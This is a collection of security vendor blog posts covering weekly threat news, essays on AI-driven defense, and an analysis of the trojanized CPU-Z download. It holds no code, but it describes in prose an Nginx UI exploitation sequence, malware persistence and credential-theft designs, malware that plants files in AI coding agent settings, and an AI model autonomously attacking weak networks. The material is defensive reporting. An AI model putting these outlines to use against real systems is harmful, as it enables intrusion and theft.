Visualização de leitura

The Good, the Bad and the Ugly in Cybersecurity – Week 19

The Good | Courts Sentence Karakurt Ransomware Negotiator & Two DPRK IT Worker Scheme Facilitators

Federal authorities have successfully secured a nearly nine-year prison sentence for Deniss Zolotarjovs, a Latvian national extradited to the U.S. for his critical role in the Karakurt extortion syndicate.

Operating as a specialized “cold case” negotiator, Zolotarjovs (aka Sforza_cesarini) systematically targeted victims who had previously stopped communications with the extortion group to avoid paying the ransom. To coerce the ransom payments, he focused on analyzing stolen personal data and information about the target companies to exert intense psychological pressure on the victims. In some cases, Zolotarjovs resorted to leveraging sensitive health information, including children’s medical records, to force the victim to complete the ransom payment.

Source: Dayton247now

The broader Karakurt operation has extorted an estimated $56 million from dozens of compromised organizations. As the first Karakurt member to face federal prosecution, Zolotarjovs’s sentencing is a hard-won milestone in ongoing efforts to dismantle international cyber-extortion rings.

In a separate victory, U.S. prosecutors sentenced two American nationals to 18 months in prison each for operating extensive laptop farms that actively facilitated North Korean cyber infiltration.

Matthew Knoot and Erick Prince were prosecuted for helping DPRK-based IT workers secure remote employment at almost 70 U.S. companies by exploiting stolen identities. The pair received company-issued laptops and deployed unauthorized remote desktop software, allowing the North Korean workers to seamlessly masquerade as legitimate domestic employees.

The FBI continues to warn about the thousands of North Korean IT workers working to infiltrate U.S. firms to steal intellectual property, implant malware, and siphon funds to the heavily sanctioned regime.

The Bad | PCPJack Worm Evicts TeamPCP, Steals Cloud Credentials at Scale

SentinelLABS researchers this week exposed PCPJack, a sophisticated credential theft framework and cloud worm that targets public infrastructure to harvest sensitive data.

Unlike other known cloud hacktools, the toolset actively hunts, evicts, and systematically deletes artifacts associated with TeamPCP, a threat group responsible for multiple high-profile supply chain intrusions earlier this year.

The multi-stage infection chain begins with a shell script called bootstrap.sh, which establishes persistence and selectively downloads specialized Python modules from an attacker-controlled Amazon S3 bucket. The malware extracts a massive array of sensitive credentials, including cloud access keys, Kubernetes service account tokens, Docker secrets, enterprise productivity application tokens, and cryptocurrency wallets. Unlike typical cloud-focused threat campaigns, PCPJack does not deploy cryptomining payloads on victims.

Beginning of bootstrap.sh, the dropper script

To achieve lateral movement, the framework exploits a number of web vulnerabilities, including severe Next.js and WordPress flaws, while aggressively scanning for poorly secured Docker, Redis, RayML, and MongoDB instances. Stolen data is then encrypted before being exfiltrated via attacker-controlled Telegram channels.

Security teams are advised to strictly enforce multi-factor authentication on service accounts, restrict Kubernetes access scopes, use an enterprise-wide vault, and thoroughly secure all exposed cloud management interfaces.

The Ugly | Palo Alto Warns of Critical Flaw in PAN-OS Enabling Remote Code Execution

Palo Alto Networks customers were issued an urgent warning this week regarding a critical-level, unpatched zero-day vulnerability currently being exploited in the wild.

Tracked as CVE-2026-0300, the buffer overflow flaw directly impacts the PAN-OS User-ID Authentication Portal (aka the Captive Portal), enabling unauthenticated attackers to execute arbitrary code with root privileges using specially-crafted packets.

With a CVSS score of 9.3, the vulnerability presents an immediate risk to enterprise networks. Threat watchdog Shadowserver has currently identified over 5,000 vulnerable firewalls exposed online, primarily concentrated across Asia and North America.

Source: ShadowServers (current as of this writing)

This actively exploited vulnerability adds to the growing pattern of targeting edge infrastructure. PAN-OS has a well-documented history of severe zero-days, and with 90% of Fortune 10 companies and many major U.S. banks depending on it, the exposure is significant. CISA has added the flaw to its Known Exploited Vulnerabilities (KEV) catalog, setting mandatory remediation deadlines for federal civilian agencies.

With a patch not expected until mid-May, Palo Alto is urging administrators to secure affected environments immediately, starting by confirming exposure via the device’s Authentication Portal Settings. To successfully mitigate the threat of remote code execution, security teams can restrict all User-ID Authentication Portal access exclusively to trusted internal IP addresses. If strict network segmentation is impossible, organizations are being advised to disable the Captive Portal service until updates can be safely applied.

The Good, the Bad and the Ugly in Cybersecurity – Week 18

The Good | Authorities Dismantle State-Backed Espionage & Cybercrime Rings

This week, authorities successfully secured the extradition of Xu Zewei, an alleged Chinese Ministry of State Security (MSS) contract hacker, from Italy to the U.S. to face severe federal cyberespionage charges. Operating alongside the Silk Typhoon group, Xu systematically compromised internet-facing systems during a highly coordinated intelligence-gathering campaign between February 2020 and June 2021. The DoJ says that the attackers relentlessly targeted COVID-19 research organizations, stealing critical vaccine and treatment data by exploiting Microsoft Exchange Server zero day vulnerabilities and deploying malicious web shells for deep network access. Xu is set to appear in federal court where he faces multiple counts of computer intrusions and conspiracy.

Source: Italian Justice System

European law enforcement agencies have dismantled a widespread cryptocurrency investment fraud network responsible for inflicting over €50 million in estimated global losses. Operating almost identically to a legitimate enterprise, the syndicate employed up to 450 individuals across several specialized call centers located in Albania. Threat actors worked by luring vulnerable victims through online advertisements, assigning “retention agents” who wore down the targets through intense pressure and remote access software to manipulate deposits. Illicit funds were then channeled into international money-laundering pipelines to evade authorities worldwide.

Evan Tangeman is receiving a nearly six year prison sentence for laundering $230 million in a cryptocurrency heist that took place between October 2023 and May 2025. Based on court documents, attackers initially breached a Washington D.C. victim by aggressively impersonating Gemini customer support, leveraging remote desktop software to steal thousands of Bitcoin after bypassing two-factor authentication protocols. Tangeman systematically obfuscated the stolen proceeds through a network of cryptocurrency mixers, exchanges, and virtual private networks. The ill-got funds financed the criminal organization’s lavish lifestyle until his eventual arrest by law enforcement officials.

The Bad | New Report Shows Scammers Stole $2.1 Billion from Social Media Users

A new warning has come from the U.S. Federal Trade Commission (FTC) regarding a pointed surge in social media fraud, with reported consumer losses exceeding $2.1 billion in 2025. Representing an eightfold increase since 2020, malicious actors actively leveraged platforms like Facebook, Instagram, and WhatsApp to exploit nearly 30% of all fraud victims last year. Remarkably, individuals reported losing significantly more money to Facebook-originated schemes than to traditional text and email campaigns combined, establishing the platform as the primary threat vector for almost every age demographic.

Who gets scammed more often, younger people or older adults? At the FTC we know scammers target everyone, and FTC Chairman @AFergusonFTC has a message that might surprise you: pic.twitter.com/8kveWbsM0e

— FTC (@FTC) April 27, 2026

Operating with a global reach and minimal overhead, threat actors systematically hijack legitimate user accounts, analyze personal posts to craft highly targeted social engineering lures, and actively purchase deceptive advertisements. These criminal syndicates utilize the exact same marketing tools legitimate businesses employ, filtering potential victims by age, precise interests, and specific shopping habits to maximize the returns.

In direct response to these findings, Meta has already removed more than 159 million scam advertisements and taken down nearly 11 million malicious accounts tied to criminal operations last year. Additionally, the tech giant has introduced advanced anti-scam protections across its product ecosystem, proactively flagging suspicious friend requests, implementing intelligent chat detection systems, and introducing critical screen sharing warnings on WhatsApp to disrupt fraudulent video calls.

To successfully navigate and mitigate social engineering tactics, federal authorities strongly urge users to strictly limit profile visibility, independently verify unfamiliar online vendors, and reject any unsolicited investment advice originating from unknown social media contacts.

The Ugly | Threat Actors Poison SAP-Related npm Packages in Supply Chain Attack

Cybersecurity researchers are tracking a highly sophisticated supply chain attack targeting SAP-related npm packages with credential-stealing malware. Dubbed “Mini Shai-Hulud”, the campaign recently compromised vital packages within SAP’s cloud application development ecosystem, including @cap-js/db-service@2.10.1, @cap-js/postgres@2.2.2, @cap-js/sqlite@2.2.2, and mbt@1.2.48. Threat actors executed the breach by exploiting an npm OIDC trusted publishing configuration gap, allowing them to exchange a token and publish poisoned package versions to the registry.

Source: Aikido

Once installed, the malicious releases deploy a preinstall script acting as a runtime bootstrapper to immediately download and execute a platform-specific Bun binary. The malware then harvests local developer credentials, GitHub and npm tokens, GitHub Actions secrets, cloud secrets from major providers, and passwords across multiple web browsers. To establish persistence, the payload targets AI coding agent configurations by injecting malicious files into Claude Code and Visual Studio Code settings. This ensures automated execution whenever an infected repository is opened. To add to this, the malware deliberately terminates on Russian-locale systems, strongly linking the entire operation to previous TeamPCP threat actors.

The stolen data is securely encrypted using AES-256-GCM and exfiltrated to public GitHub repositories created on the victim’s own account. By leveraging GitHub as their primary command and control (C2) infrastructure, the attackers make tracing and blocking exfiltration exceptionally difficult for security and development teams.

Since the massive payload utilizes stolen tokens to aggressively self-propagate, injecting malicious workflows into newly discovered repositories further spreads the poisoned packages across environments. Package maintainers have rapidly released updated, safe versions of the affected software to immediately mitigate this expanding threat.

The Good, the Bad and the Ugly in Cybersecurity – Week 17

The Good | Two Cybercrime Leaders Face Justice for Fraud, Identity Theft & Extortion

Tyler Robert Buchanan, a 24-year-old British national believed to be a leader of the UNC3944 cybercrime group, has pleaded guilty in the U.S. to wire fraud and aggravated identity theft. Prosecutors say Buchanan and four accomplices stole at least $8 million in cryptocurrency by targeting employees at multiple organizations with SMS phishing attacks between 2021 and 2023. Victims were tricked into entering credentials on fake company login pages, allowing attackers to hijack email accounts, conduct SIM swaps, and drain cryptocurrency wallets.

Buchanan arrested in Spain (Source: Spanish National Police Corps)

Arrested in Spain in 2024 and extradited to the U.S. in last year, Buchanan now faces up to 22 years in prison at his sentencing this August. UNC3944 (aka 0ktapus, Scattered Spider) has historically been linked to major breaches at MGM Resorts International, Twilio, and Caesars Entertainment.

In a second guilty plea this week, Angelo Martino, a former ransomware negotiator at DigitalMint, has formally admitted to helping the BlackCat ransomware gang extort U.S. companies. Martino secretly shared clients’ confidential negotiation strategies and insurance policy limits with BlackCat operators, enabling them to demand larger ransoms. He also worked directly with other DigitalMint and Sygnia accomplices to launch ransomware attacks against multiple victims in 2023, targeting law firms, school districts, medical facilities, and financial firms. In one case, a victim paid over $25 million to settle the ransom.

Authorities have since seized $10 million in Martino’s assets, including cryptocurrency and luxury vehicles. He will also receive up to 20 years in prison when sentenced in July under the charge of conspiracy to and interference with interstate commerce by extortion as well as intentional damage to protected computers.

The Bad | Chinese-Linked Threat Actors Expand Botnets to Disguise Cyberattacks

The U.K.’s National Cyber Security Centre (NCSC-UK) and allied cyber agencies are warning that China-linked actors are increasingly relying on vast proxy networks of hijacked consumer devices to conceal cyberattacks and evade detection. A new joint statement details how the threat actors now route malicious traffic through compromised routers, cameras, recorders, and network-attached storage (NAS) devices instead of using rented infrastructure. This method means attacks are harder to trace since their geographic origins are masked.

Covert network typical setup (Source: NCSC-UK)

Officials say most China-nexus groups are now leveraging constantly shifting covert proxy networks, sometimes shared across multiple threat actors. These networks are mostly made up of Small Office Home Office (SOHO) routers, smart devices, and Internet of Things (IoT) devices. One example is a massive botnet called Raptor Train, which infected more than 260,000 devices in 2024 and was linked by the FBI to the state-backed Flax Typhoon and Integrity Technology Group, sanctioned back in January 2025. Another network, KV Botnet, has been tied to the PRC-backed Volt Typhoon group and targets vulnerable routers that no longer receive security updates. Though KV Botnet was disrupted by authorities in January 2024, Volt Typhoon actors began reviving it as of November that same year.

Authorities warn these botnets undermine traditional IP-blocking defenses because their infrastructure constantly changes. To reduce exposure, organizations are being urged to strengthen edge security by enforcing multi-factor authentication, maintaining updated inventories of internet-facing devices, using dynamic threat intelligence feeds, and adopting zero-trust controls. The advisory outlines the growing concern that everyday internet-connected devices are being weaponized at scale to support stealthy cyber operations targeting governments, telecom providers, defense contractors, and critical infrastructure worldwide.

The Ugly | ShadowBrokers Leak Links to Pre-Stuxnet Sabotage Framework

SentinelLABS has identified a previously undocumented cyber sabotage framework, tracked as “fast16”, with core components dating back to 2005. The operation centers on a kernel driver, fast16.sys, designed to intercept executable files in memory and subtly alter high-precision calculations to corrupt scientific and engineering outputs at scale.

The framework predates Stuxnet by at least five years and even early Flame-era tooling, making it one of the earliest known examples of a modular, Lua-based malware architecture. It was discovered alongside a companion service binary, svcmgmt.exe, which embeds a Lua virtual machine, encrypted bytecode, and system-level modules for propagation, persistence, and coordination across infected systems.

Unlike typical worms of its era, fast16 was engineered for targeted sabotage rather than indiscriminate spread. It selectively identifies compiled executables, particularly those using Intel toolchains, and injects rule-based modifications into floating-point computation routines.

SentinelLABS believes this could have introduced systematic errors into domains such as physics simulations, cryptographic research, and structural engineering models, effectively undermining high-value scientific workloads without obvious system failure. The carrier component also functions as a self-propagating wormlet (wormable payloads) platform, capable of deploying across networks using native Windows2000/XP services and weak administrative credentials.

Structure of the internal storage
Wormlets stored in the carrier’s internal storage

SentinelLABS linked fast16.sys to the infamous ShadowBrokers leak from 2017 via deconfliction signatures used within advanced state-level tooling ecosystems by the NSA. Although full target attribution remains incomplete, analysis of matching code patterns suggests potential alignment with high-precision simulation software used in engineering and defense research.

The fast16 framework offers a rare early glimpse into real-world operations where kernel-level tampering, modular scripting, and precision sabotage logic were already converging. Although fast16 itself was built to run on now-obsolete operating systems, SentinelLABS discovery pushes back the accepted timeline on modern tradecraft, showing how well-resourced actors had been building long-lived implants that prefigured today’s state-backed cyber programs years earlier than previously thought.

Automation at Machine Speed: Rethinking Execution in Modern Cybersecurity

In our previous posts, we explored the Identity Paradox and the rising risks at the enterprise edge. Together, these blogs highlighted how attackers gain initial access and leverage unmanaged devices to escalate privileges. The next phase of intrusion – execution – demonstrates how modern adversaries, aided by automation and AI, operate at speeds and a scale that challenge traditional human-centered defenses. Understanding these capabilities is critical for organizations aiming to reduce attacker dwell time and maintain operational resilience.

Automation: The Real Machine Multiplier

The cybersecurity conversation today often centers on AI, with organizations experimenting with generative models, agentic systems, and predictive analytics. While these tools offer unique capabilities, the backbone of modern defense and the source of the real operational advantage is automation.

In today’s landscape where we are seeing a shrinking window for response, adversaries are operating almost entirely at machine speed. In this environment, human operators alone cannot respond fast enough to prevent compromise. Automation enables defenders to reclaim the tempo. By integrating AI insights into hardened automated workflows, security teams can move from reactive triage to proactive intervention, closing gaps before attackers can exploit them. SentinelOne’s® own internal data demonstrates the tangible impact of this shift, showing that proper automation can save analysts approximately 35% manual workload despite 63% growth in total alerts, proving that automation can increase operational speed.

AI as Insight, Not Just Hype

The irony of AI innovation in the last year is that the AI tools we deploy to defend ourselves now need defending. The attack surface didn’t just grow, it folded back on itself. Automation executes tasks at speed, but AI provides context and predictive intelligence that guides those tasks. AI for security encompasses two complementary disciplines:

  • Security for AI: Protecting AI tools, models, and agentic systems themselves from misuse or compromise. This includes governing employee access, ensuring secure coding practices, and managing autonomous AI agents.
  • AI for Security: Leveraging machine learning and reasoning systems to detect and respond to threats faster than traditional rule-based approaches.

AI excels in identifying subtle behavioral patterns, predicting attacker intent, and supporting agentic workflows that can autonomously investigate alerts, recommend actions, and enforce pre-approved policies. By combining high-quality data, low-latency telemetry, and centralized visibility, AI transforms raw signals from endpoints, cloud environments, and identity systems into actionable insights.

However, AI is not a panacea. Without robust automation to operationalize these insights, organizations risk generating alerts faster than they can respond, replicating the same bottlenecks that have plagued traditional security operations.

Threats Accelerated by Automation and AI

Attackers are leveraging the same principles. Across campaigns observed in 2025 and 2026, adversaries are increasingly automating reconnaissance, exploitation, and lateral movement. Examples include:

  • AI-assisted phishing: Rapid generation of highly localized and convincing campaigns in minutes, bypassing traditional content filters.
  • Polymorphic malware: AI-generated malware that mutates faster than signature-based defenses can detect.
  • Automated pivoting: Integration with compromised edge devices or cloud assets to move laterally and escalate privileges at machine speed.

These behaviors compress the attack lifecycle dramatically. What once required hours or days now occurs in milliseconds, highlighting why both automation and AI must form the core of modern defensive strategies.

Transforming Enterprise Operations with Agentic AI

Defending against machine-speed attacks requires agentic AI – systems that can perform investigative and response tasks autonomously, but under human-defined guardrails. SentinelOne’s Purple AI™ exemplifies this approach:

  • Agentic auto-investigations: From alert assessment to hypothesis validation, Purple AI can perform complete investigations with minimal human intervention, documenting every step for audit and compliance.
  • Custom detection creation: Analysts receive agentically recommended detection rules that can be implemented immediately to stop similar attacks before they spread.
  • Integrated hyperautomation: Workflows, alerts, and response actions are executed automatically across endpoints, cloud services, and AI systems, enabling coordinated defense at machine speed.

These capabilities bridge the gap between insight and action, ensuring that detection is accurate and response is rapid, precise, and auditable. As organizations adopt AI for business processes, security must evolve to address the expanding attack surface. Key challenges include:

  • Shadow AI adoption: Employees and teams using unmonitored AI tools create unseen channels for data exfiltration or misconfiguration.
  • Agentic AI risks: Autonomous agents acting without sufficient oversight could unintentionally expose sensitive data or introduce vulnerabilities.
  • Data velocity and volume: AI systems rely on vast, real-time data streams. Ensuring integrity, context, and governance of that data is critical to maintain trust in automated defenses.

Solutions must integrate visibility, control, and governance. SentinelOne’s Prompt Security portfolio provides real-time monitoring for employee AI use, AI coding tools, and agentic AI operations. By automatically redacting secrets, blocking vulnerable code, and enforcing policy compliance, organizations can safely harness AI while reducing exposure.

Meanwhile, Observo AI and AI-native SIEM integration enable organizations to ingest, normalize, and analyze petabytes of telemetry in near real time. By pairing this high-fidelity data with Purple AI’s agentic reasoning, defenders can detect threats, trigger pre-approved responses, and maintain operational oversight across both traditional and AI-native environments.

Operational Principles for Machine-Speed Defense

Implementing an effective AI- and automation-driven security strategy requires clear guiding principles:

  • Intelligence Over Rules: Move beyond static signatures to behavioral and predictive detection. Threats evolve faster than predefined rules; systems must continuously learn, reason, and adapt.
  • Autonomy with Accountability: Automation and agentic AI should operate at machine speed, but within human-defined guardrails, ensuring actions remain traceable, auditable, and aligned with policy.
  • Unified Data and Context: Signals from endpoints, identities, cloud, and AI tools must be fused to create a coherent understanding. Insight without context is noise; action without context is risk.

When consistently applied, these principles reduce dwell time, enable faster response, and ensure that human expertise is focused on high-value decision-making rather than repetitive manual tasks.

Conclusion | Automation & AI as Allies

For two decades, security has been a human-speed discipline applied to a machine-speed problem. That model is over. The organizations that will lead from here aren’t the ones with more analysts or better dashboards. They’re the ones where detection, investigation, and response happen autonomously. The future will be defined by organizations where human and AI manage the SOC together: AI reasons, automation acts, and humans govern the process. Not in sequence. In parallel. At machine speed.

Execution is no longer a phase in the kill chain. It’s the entire game. The defenders who win it won’t be the fastest responders. They’ll be the ones who made their response automatic.

The evolution of execution in cybersecurity demonstrates a broader trend: Defenders must match the speed, scale, and sophistication of adversaries. Not just tools, automation and AI are partners in defense and able to extend human capacity while maintaining oversight, context, and control.

Organizations that invest in integrated, agentic AI systems and robust automated workflows can detect and respond to attacks in real time, reduce analyst workload while increasing coverage, and secure AI adoption itself, maintaining trust in both technology and operations. This shift marks a transition from perimeter-based and manual defense to autonomous, adaptive security, where systems and people collaborate to outpace attackers, secure critical assets, and support business innovation.

Execution is the new frontier in the cyber kill chain. By combining automation, AI-driven insight, and human oversight, organizations can operate at machine speed, defend against advanced threats, and confidently embrace AI-powered transformation.

As the cybersecurity landscape evolves, success will no longer depend solely on faster patching, deeper monitoring, or more alerts. It will depend on the intelligent orchestration of people, machines, and AI, enabling defenders to act faster, smarter, and with confidence in a world where adversaries are already moving at machine speed.

SentinelOne's Annual Threat Report
A defender’s guide to the real-world tactics adversaries are using today to abuse identity, exploit infrastructure gaps, and weaponize automation.

 

The Good, the Bad and the Ugly in Cybersecurity – Week 16

The Good | U.S. Authorities Seize W3LL Phishing Ring & Jail DPRK IT Worker Scheme Facilitators

The FBI has dismantled the “W3LL” phishing platform, seized its infrastructure, and arrested its alleged developer in its first joint crackdown on a phishing kit developer together with Indonesian authorities. Sold for $500 per kit, W3LL-enabled criminals to clone login portals, steal credentials, bypass MFA using adversary-in-the-middle techniques, and launch business email compromise attacks.

The W3LL Store interface (Source: Group-IB)

Through the W3LL Store marketplace, more than 25,000 compromised accounts were sold, fueling over $20 million in attempted fraud. Even after the storefront shut down in 2023, the operation continued through encrypted channels under new branding. It was then used against over 17,000 victims worldwide after W3LL gave cybercriminals an end-to-end phishing service. Investigators say the takedown disrupted a major criminal ecosystem that helped more than 500 threat actors steal access, hijack accounts, and commit financial fraud.

From the DoJ, two U.S. nationals have been sentenced for helping North Korean IT workers pose as American residents and secure remote jobs at more than 100 U.S. companies, including Fortune 500 firms. Court documents note that between 2021 and 2024, the scheme generated over $5 million for the DPRK and caused about $3 million in losses to victim companies. The defendants used stolen identities from over 80 U.S. citizens, created fake companies and financial accounts, and hosted company-issued laptops in U.S. homes so North Korean workers could secretly access corporate networks.

U.S. officials said the operation endangered national security by placing DPRK operatives inside American businesses. Kejia Wang will receive nine years in prison, while Zhenxing Wang is sentenced to over seven years. Authorities say the broader network remains active, with additional suspects still at large, as North Korea continues using fraudulent remote workers to fund government operations and evade sanctions.

The Bad | New “AgingFly” Malware Breaches Ukrainian Governments & Hospitals

Ukraine’s CERT-UA has uncovered a new malware campaign using a toolset called “AgingFly” to target local governments, hospitals, and possibly Ukrainian defense personnel.

The attack (UAC-0247) begins with phishing emails disguised as humanitarian aid offers that lure victims into downloading malicious shortcut files. These files trigger a chain of scripts and loaders that ultimately deploy AgingFly, a C# malware strain that gives attackers remote control of infected systems.

Example of chain of damage (Source: CERT-UA)

Once installed, AgingFly can execute commands, steal files, capture screenshots, log keystrokes, and deploy additional payloads. It also uses PowerShell scripts to update configurations and retrieve command and control (C2) server details through Telegram, helping the malware remain flexible and persistent.

One notable feature is that it downloads pre-built command handlers as source code from the server and compiles them directly on the infected machine, reducing its static footprint and helping it evade signature-based detection tools.

Investigators found that the attackers use open-source tools such as ChromElevator to steal saved passwords and cookies from Chromium-based browsers, and ZAPiDESK to decrypt WhatsApp data. Additional tools like RustScan, Ligolo-ng, and Chisel support reconnaissance, tunneling, and lateral movement across compromised networks. CERT-UA says the campaign has impacted at least a dozen organizations and may also have targeted members of Ukraine’s defense forces.

To reduce exposure, the agency recommends blocking the execution of LNK, HTA, and JavaScript files, along with restricting trusted Windows utilities such as PowerShell and mshta.exe that are abused in the attack chain.

The Ugly | Attackers Exploit Nginx Auth Bypass Vulnerability to Hijack Servers

A critical vulnerability in Nginx UI, tracked as CVE-2026-33032, is being actively exploited in the wild to achieve full server takeover without authentication.

The flaw stems from an exposed /mcp_message endpoint in systems using Model Context Protocol (MCP) support, which fails to enforce proper authentication controls. As a result, remote attackers can invoke privileged MCP functions, including modifying configuration files, restarting services, and forcing automatic reloads to effectively gain complete control over affected Nginx servers.

The attacker-controlled page by nginx (Source: Pluto Security)

Security researchers have reported that exploitation requires only network access. Attackers initiate a session via Server-Sent Events, open an MCP connection, retrieve a session ID, and then use it to send unauthenticated requests to the vulnerable endpoint.

This grants access to all available MCP tools, executing destructive capabilities like injecting malicious server blocks, exfiltrating configuration data, and triggering service restarts.

The vulnerability was patched in version 2.3.4 shortly after the disclosure, but a more secure release, 2.3.6, is now recommended. Despite the fix, active exploitation in the wild has been confirmed with proof-of-concept code publicly available.

Nginx UI is widely used, with over 11,000 GitHub stars and hundreds of thousands of Docker pulls, and scans suggest roughly 2,600 exposed instances remain vulnerable globally. Attackers can establish MCP sessions, reuse session IDs, and chain requests to escalate privileges, enabling stealthy persistence, configuration tampering, and full administrative control over exposed systems.

Organizations are urged to update immediately, as attackers can fully compromise systems through a single unauthenticated request, bypassing traditional security controls and gaining persistent control over web infrastructure.

Frontier AI Reinforces the Future of Modern Cyber Defense

The latest announcements from OpenAI and Anthropic mark another important step forward for frontier AI. They also reinforce something we’ve believed at SentinelOne® for years: the future of cybersecurity will be shaped by AI-native defense.

SentinelOne has worked closely with frontier labs for years, including OpenAI, Anthropic, and Google DeepMind, and naturally continues to do so. While we cannot always share the specifics of every collaboration, these partnerships have provided, and continue to provide meaningful insight into how advanced models are evolving and where they can create real impact across security. Many of these learnings and capabilities are already embedded in our platform, protecting customers from the most advanced attacks – every day, stopping zero day exploits no other solution is currently able to.

What stands out most is not simply that frontier models are becoming more capable, but that they are accelerating the broader shift toward faster, more intelligent, and more automated security operations. On the one hand, they are improving how the cyber industry and defenders identify weaknesses, analyze complex systems, and reason about attack paths at scale. On the other, they are giving attackers the advantage of speed and scale when it comes to finding new vulnerabilities. Progress in this race matters, but it is only one part of the broader security picture.

In practice, and without discounting the severity of uncovering exponentially more bugs in software, raw vulnerability counts rarely map cleanly to real-world risk. Many vulnerabilities are not meaningfully exploitable in live environments, and many are already reduced by architectural layers, controls, mitigations, and runtime protections. The gap between theoretical exposure and operational risk is often substantial. What matters most is the ability to understand real conditions, prioritize what matters, and stop actual attacks across complex environments, even when faced with novel threats and zero days.

That has been SentinelOne’s pioneering principle and the advantage we’ve delivered to our customers from the beginning.

From day one, SentinelOne was built to operate at machine speed, using behavioral AI, automation, and autonomous protection to detect, defend, and respond across endpoint, cloud, identity, data, network, and AI attack surfaces. As frontier AI continues to advance, the value of that approach only grows.  To demonstrate our commitment to these principles, we’d provide two distinct examples.

First, in the last few weeks alone, the benefit of such an approach has played out in supply chain attacks, like LiteLLM, Axios, and CPU-Z, all illustrative of novel threats and the risk of trusted agents and workflows in the AI era. In each case, autonomous response at machine speed was the only antidote to block these novel threats that leverage unpatched, or zero day vulnerabilities.

Second, SentinelOne demonstrably expanded our own ongoing efforts to secure our technology.  Along with the standard, established efforts we’ve used for years, SentinelOne has used multiple, AI-driven models to constantly examine our technology and architecture in techniques virtually identical to those discussed in Anthropic’s technical details for researchers and practitioners released April 7th 2026 (Assessing Claude Mythos Preview’s cybersecurity capabilities). This activity has been ongoing for months and is also consistently reviewed for findings as well as evaluated as a program by the SentinelOne executive team. It is our commitment to build and deliver secure technology and we do not see an effective future in this work without robust AI-driven methods, and an inclusive, multi-model approach.

As we look at the overall AI landscape, the shift is already underway, and it plays directly to SentinelOne’s strengths. The industry is moving toward more autonomous, more adaptive, and more intelligence-driven security. That is the future we helped pioneer, and one we are uniquely positioned to lead.

Our clear advice to defenders: Invest in machine speed defense and visibility right now. Ensure your defenses are up to date and well configured. Ground yourself in true research, not press releases and hype. As an example, many of the press and information shared by third parties around Anthropic’s new model release have lacked any substantive data – in many cases those statements preceded any real, tangible experience with the preview models in question. Inversely, the AI Security Institute (AISI) released a detailed research evaluation of relevant models, which sheds light on the state of frontier AI, exploitation rates, and potential real world implications. It clearly shows the trajectory, even from older models, had been apparent for a while, and that capability has existed and in many cases has been a function of compute scaling, as well as potentially the result of looser guardrails allowing more effective compute and reasoning than guardrailed models:

Source: AISI, Our evaluation of Claude Mythos Preview’s cyber capabilities, April 13th 2026
Source: AISI, Our evaluation of Claude Mythos Preview’s cyber capabilities, April 13th 2026

The AI Security Institute also goes forward and outlines the following implications:

“Mythos Preview’s success on one cyber range indicates that it is at least capable of autonomously attacking small, weakly defended and vulnerable enterprise systems where access to a network has been gained. However, our ranges have important differences from real-world environments that make them easier targets. They lack security features that are often present, such as active defenders and defensive tooling. There are also no penalties for the model for undertaking actions that would trigger security alerts. This means we cannot say for sure whether Mythos Preview would be able to attack well-defended systems.

In a regime where attackers can direct and provide network access to models to conduct autonomous attacks on poorly defended systems, cybersecurity evaluations must evolve. As capabilities continue to improve, evaluation environments that lack defenses will no longer be challenging enough to discriminate between the capabilities of the most cyber-capable models or assess trends. Our future work will involve evaluating capabilities using ranges simulating hardened and defended environments, including ranges with active monitoring, endpoint detection and real-time incident response. We will also be tracking how AI-enabled vulnerability discovery and penetration testing campaigns perform on real-world systems.”

Stay safe,

The SentinelOne team

Third-Party Trademark Disclaimer:

All third-party product names, logos, and brands mentioned in this publication are the property of their respective owners and are for identification purposes only. Use of these names, logos, and brands does not imply affiliation, endorsement, sponsorship, or association with the third-party.

Securing the Software Supply Chain: How SentinelOne’s AI EDR Autonomously Blocked the CPU-Z Watering Hole Cyber Attack

On April 9, 2026, cpuid.com was actively serving malware through its own official download button. Threat actors had compromised the CPUID domain at the API level and were silently redirecting legitimate download requests to attacker-controlled infrastructure. The attack ran for approximately 19 hours. Users who navigated directly to the official site received a legitimate, properly signed binary with a malicious payload bundled inside it.

That morning, SentinelOne’s behavioral detection flagged an anomaly inside cpuz_x64.exe. The binary was genuine. The digital signature was valid. The download had arrived from the vendor’s own infrastructure. The process chain cpuz_x64.exe began constructing was the tell: it spawned PowerShell, which spawned csc.exe, which spawned cvtres.exe. CPU-Z does not do that.

CPU-Z, HWMonitor, HWMonitor Pro, and PerfMonitor are staples in IT toolkits. The users who downloaded them followed every instruction they’d been given. The trust chain broke above them. The next attack will work the same way.

SentinelOne’s Annual Threat Report identifies exactly this pattern as a systemic shift: “This [shift] extends deeply into the software supply chain, where the identity of a trusted developer becomes the vector of attack.” In late 2025, we observed the GhostAction campaign, where a compromised GitHub maintainer account pushed malicious workflows to extract secrets. A concurrent phishing attack against a maintainer of popular NPM packages deployed malicious code capable of intercepting cryptocurrency transactions. In each case, the commit logs and push events appeared legitimate because they originated from accounts with valid write access. The identity was verified. The intent had been subverted. The CPUID incident extends this pattern to software distribution itself: the supplier’s download infrastructure became the delivery channel.

What the Agent Saw

The SentinelOne agent triggered the alert “Penetration framework or shellcode was detected” within the first seconds of execution. The detection came from what the process was doing, with five specific behavioral indicators converging:

  • Anomalous API resolution: The process located system functions through non-standard discovery methods, bypassing the OS loader entirely.
  • Reflective code loading: Executable code was running in memory regions with no corresponding file on disk.
  • Suspicious memory allocation: Read-Write-Execute (RWX) memory permissions were requested, a staging pattern for malicious payloads.
  • Process injection patterns: Execution flow consistent with code being redirected into a secondary process to mask its origin.
  • Heuristic shellcode signatures: Sequential operations characteristic of automated exploitation toolkits preparing an environment for command execution.

The agent autonomously terminated and quarantined the involved processes before the attack advanced further. The malicious CRYPTBASE.dll, placed in the same directory as the legitimate CPU-Z binary, was loaded by Windows before the real system DLL could be reached, and it never completed its job.

Alert Page
Alert Page

The agent was watching for what the software was trying to do. Behavioral detection is the layer that holds when authorization cannot be trusted, because the behavior reveals intent regardless of what signed the package.

Behavioral Indicator
Behavioral Indicator
Process Tree
Process Tree
Event Table
Event Table

What Was Actually Inside

The trojanized packages were designed to leave no trace. A reflective PE loader decrypted and injected a second-stage DLL using XXTEA encryption and DEFLATE decompression, no disk writes, no file artifacts. Three redundant persistence mechanisms were then installed: a registry Run key, a 68-minute scheduled task with a 20-year duration, and MSBuild project files in AppData\Local engineered to survive reboots and partial remediation.

The 2026 Annual Threat Report describes this persistence design as “masquerading as maintenance”: adversaries blend into the environment by mimicking legitimate system updates and background processes. To a busy defender, a scheduled task with a generic name and a timed execution interval appears entirely routine until you examine what it is executing. STX RAT’s 68-minute task with a 20-year duration operates on exactly this logic.

The process chain visible in EDR logs made the intent clear: cpuz_x64.exe spawned powershell.exe, which spawned csc.exe, then cvtres.exe. CPU-Z does not do that.

